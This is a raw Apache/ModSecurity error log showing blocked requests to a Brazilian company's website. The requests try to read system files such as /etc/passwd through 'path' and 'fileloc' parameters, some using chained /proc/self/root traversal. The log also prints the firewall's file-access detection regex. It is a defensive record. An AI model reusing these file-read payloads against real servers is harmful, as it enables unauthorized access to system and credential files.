[Wed Mar 18 03:59:12.403395 2026] [:error] [pid 17887:tid 140411708356352] [client 216.73.216.191:46882] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpNPwkwaGbbGflqUZDTHAAAAMQ"]
[Wed Mar 18 03:59:14.053100 2026] [:error] [pid 17887:tid 140411540502272] [client 216.73.216.191:44853] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf.save"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpNQgkwaGbbGflqUZDTIwAAANg"]
[Wed Mar 18 03:59:20.923265 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.241.31:36246] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpNSOyqAr6etmhZHNp4sgAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:59:32.567820 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.243.128:48066] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpNVCmAPhZkrhU8w4kubQAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:59:36.025842 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:54858] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpNVdY0UrI5A3LftIxSnwAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:59:45.545100 2026] [:error] [pid 11816:tid 140411733534464] [client 74.7.243.128:54862] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpNYew_le52K8_3pV2giwAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:00:56.864653 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.241.31:53378] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpNqEzinOy1jxa1j4fTPAAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:00:59.251940 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.241.31:41052] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpNqwkwaGbbGflqUZDTSgAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 04:01:59.929388 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.244.43:37004] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpN5-yqAr6etmhZHNp5MAAAAFE"]
[Wed Mar 18 04:02:01.601086 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.228.61:42332] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpN6dY0UrI5A3LftIxTTQAAAZU"]
[Wed Mar 18 04:02:09.262636 2026] [:error] [pid 29882:tid 140411616036608] [client 74.7.243.128:36524] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpN8UzinOy1jxa1j4fTdQAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:02:41.275470 2026] [:error] [pid 11816:tid 140411565680384] [client 216.73.216.191:38226] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOEew_le52K8_3pV2gzAAAAhU"]
[Wed Mar 18 04:03:34.035160 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.241.31:59192] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpORuyqAr6etmhZHNp5gwAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:03:59.618521 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:42846] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOX-oXxyEfFpUF8f8uaQAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:01.052017 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:44942] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOYeyqAr6etmhZHNp5qAAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:02.610981 2026] [:error] [pid 11816:tid 140411649607424] [client 74.7.243.128:44948] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOYuw_le52K8_3pV2g7gAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:11.571140 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.243.128:44958] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOa-yqAr6etmhZHNp54QAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:12.991022 2026] [:error] [pid 15051:tid 140411582465792] [client 74.7.243.128:60046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpObCmAPhZkrhU8w4ku2AAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:13.389811 2026] [mime_magic:error] [pid 31803:tid 140411691570944] (70014)End of file found: [client 216.73.216.191:44593] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 04:04:14.023399 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.241.31:40912] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpObuyqAr6etmhZHNp5-wAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:04:16.406973 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:60062] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOcOyqAr6etmhZHNp6FQAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:17.702145 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.243.128:60076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOceyqAr6etmhZHNp6FgAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:20.098132 2026] [:error] [pid 11816:tid 140411658000128] [client 74.7.243.128:60078] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOdOw_le52K8_3pV2g8wAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:20.422837 2026] [:error] [pid 31803:tid 140411641214720] [client 216.73.216.191:50238] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOdOyqAr6etmhZHNp6IgAAAEw"]
[Wed Mar 18 04:04:20.902989 2026] [:error] [pid 15051:tid 140411548894976] [client 74.7.241.31:45252] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOdCmAPhZkrhU8w4ku6QAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:04:21.466064 2026] [:error] [pid 15826:tid 140411632822016] [client 216.73.216.191:18261] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOdeoXxyEfFpUF8f8ubwAAAU0"]
